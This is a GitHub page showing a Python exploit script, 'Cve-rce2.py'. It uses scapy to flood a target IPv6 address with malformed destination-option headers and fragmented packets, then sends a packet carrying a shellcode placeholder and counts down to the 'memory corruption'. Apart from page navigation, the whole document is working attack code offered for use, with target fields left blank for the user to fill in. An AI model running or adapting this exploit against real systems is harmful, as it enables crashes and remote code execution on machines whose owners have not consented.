-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCve-rce2.py
66 lines (56 loc) · 2.21 KB
/
Cve-rce2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from scapy.all import *
import time
# Modify these variables as needed
iface = '' # Network interface to use
ip_addr = '' # Target IP address (IPv6)
mac_addr = '' # MAC address (empty if not needed)
shcd = "example" # Replace with actual shellcode
# Constants
num_tries = 20
num_batches = 20
fragment_id_start = 0xdebac1e # Starting fragment ID
def get_packets_with_mac(i):
frag_id = fragment_id_start + i
# Create packets with malformed destination options and fragments
first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / \
IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / \
IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / \
IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
return [first, second, third]
def get_packets(i):
if mac_addr:
return get_packets_with_mac(i)
frag_id = fragment_id_start + i
# Create packets without MAC address
first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / \
IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / \
IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / \
IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
return [first, second, third]
def create_payload():
# Create payload with shellcode in an appropriate packet
payload = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64, dst=ip_addr) / \
IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata=shcd)])
return payload
final_ps = []
# Generate and collect packets
for _ in range(num_batches):
for i in range(num_tries):
final_ps += get_packets(i) + get_packets(i)
# Add payload packets
payload_packet = create_payload()
final_ps.append(payload_packet)
print("Sending packets")
if mac_addr:
sendp(final_ps, iface)
else:
send(final_ps, iface)
# Wait 1 minute to trigger the vulnerability
for i in range(60):
print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
time.sleep(1)
print("")